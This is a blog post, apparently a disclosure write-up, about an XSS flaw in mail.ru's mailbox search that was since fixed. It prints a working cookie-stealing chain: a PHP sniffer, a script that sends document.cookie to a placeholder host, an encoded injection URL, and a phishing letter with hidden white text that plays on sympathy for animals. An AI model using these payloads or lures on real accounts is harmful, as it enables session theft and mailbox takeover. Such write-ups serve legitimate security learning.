We remove other people's cookies from mail.ru

Not so long ago I read a post on Habr , in which it was proposed to attend a free event dedicated to information security issues. Since the event was held in my city, I decided that I needed to go there. The first lesson was about vulnerabilities on sites like XSS . After the lesson, I decided that I needed to consolidate the knowledge gained in real conditions. I chose for myself several sites that relate to my city and began to try to stick my script in all forms. In most cases, the script was filtered out. But it so happened that the “alert” worked and my message appeared. The vulnerability was reported to administrators, and they quickly fixed everything.

One of these days, checking for fresh mail on mail.ru, I came across a form for searching letters in a mailbox. Occasionally, I used this search to find something I needed in a heap of my old letters. Well, since in the last couple of days I inserted my “alert” almost everywhere I could, my hand reflexively reached for this search form. I typed the code for my script and hit Enter. Imagine my surprise when on the screen I saw a painfully familiar message ...

image


At a lecture Open InfoSec DaysThe speaker said that programmers are rather skeptical of vulnerabilities of this kind, they say “alert? Well, so what? This is not dangerous". If on other sites I was content only with this window with my message, then in this case I decided to go ahead and show what such an “alert” could turn out to be.

So, the script is triggered, which means there is a vulnerability. Therefore, you can try to run some other script. For example, a script that passes another user's cookies to us. For the script to work, you need to force the user to execute our script. You can do this by sending him a letter with the appropriate link, after clicking on which a search will be made in the mailbox and the code we need will be executed.

It took some time and a lot of experimentation to understand the mechanics of vulnerability. Sometimes the script worked, sometimes it was filtered out. After some efforts, it was empirically determined that the script is only 100% triggered if the search by letters gives a positive result. That is, when a user searches with our script, it is necessary that at least one letter in his mailbox is found according to the specified parameters. Arranging it is not difficult.

Next, I took up the link that will launch the search. I tracked the pattern in the address bar by which the search is performed:

image

We will send approximately the same link in the letter. Since our task is to pick up the cookies of others, we need a sniffer. The script sniff.php was written and uploaded to third-party hosting. The sniffer code is:

if (isset($_GET['cookie']))
{
$text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A');
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n";
$file = fopen("sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}
?>


Also, instead of an “alert”, you need a script that will transmit cookies to our sniffer. We will write this script in a separate file and we will load it into our search. Created a test.js file with the necessary code and uploaded it to the hosting. The script code is as follows:

img=new Image();
img.src='http://sitename.ru/sniff.php?cookie='+document.cookie;
function F() {
location='http://www.solife.ru';
}
setTimeout(F, 5000);


What I would like to clarify here. Put ourselves in the shoes of the attacker. It is necessary for the user to click on the link. How to make him do it? You can promise the golden mountains and to get them you need, follow our link to the site. But I don’t think it will work. People are no longer doing this (I constantly delete such letters without even reading). Therefore, we will play on human pity, since it still exists in nature. Ask to vote on the site for the rescue of exterminated animals. First we pick up the cookies, and then redirect the user to the site for voting. Set the timeout for redirection in 5 seconds, otherwise the cookies just did not have time to be transmitted to the sniffer, and the user was immediately transferred to the site about animals. Instead of “alert” I used the following script:

image

When the scripts were over, I started writing a letter. I came up with the following content:
image
It turned out pretty cynical, but I tried to bring the conditions closer to the most real ones. A line with a script is added at the end of the letter, so that our letter is found when we do a search. So that the line does not cause unnecessary questions, it is painted over with white. Also in the word "http" put a "space" so that the line is not recognized and not converted to a link. Otherwise, despite the fact that the script line is written in white, the link would be highlighted in blue at the recipient, but we do not need this. Smart search will still find and recognize this line, despite the spaces.

The search link used the following:

e.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

I used URL encoding for the script so that nothing would be filtered out. Also for the search added the parameter "q_folder = 0", this is so that the search takes place in the "Inbox" folder.

The letter is ready, send it. As the addressee, I used my second mailbox on the same service. We look at what has come to another box.

image

Our script text is not visible, as it merges with the background. Click on the link and see what happens. The user is moved to the search results for letters by the parameter we set. Our letter that we sent is visible in the search results. At this time, our script had already worked and sent the user's cookies to the sniffer. After 5 seconds (the time depends on the script settings), the user is redirected to the site with polls.

Checking my sniff.txt file:

image

Since my goal is not to steal someone else's mailboxes or gain access to them, I will end the story on this. But theoretically, you can replace your cookies with strangers and gain access to someone else's mailbox. In general, if an attacker catches fire with a target, then he will find use for the information received.

I would like to thank Sergey Belov ( BeLove ) for his informative event Open InfoSec Days , which inspired me to search for vulnerabilities on websites.

I would also like to thank the mail.ru team who closed this vulnerability in a matter of minutes.

Also popular now: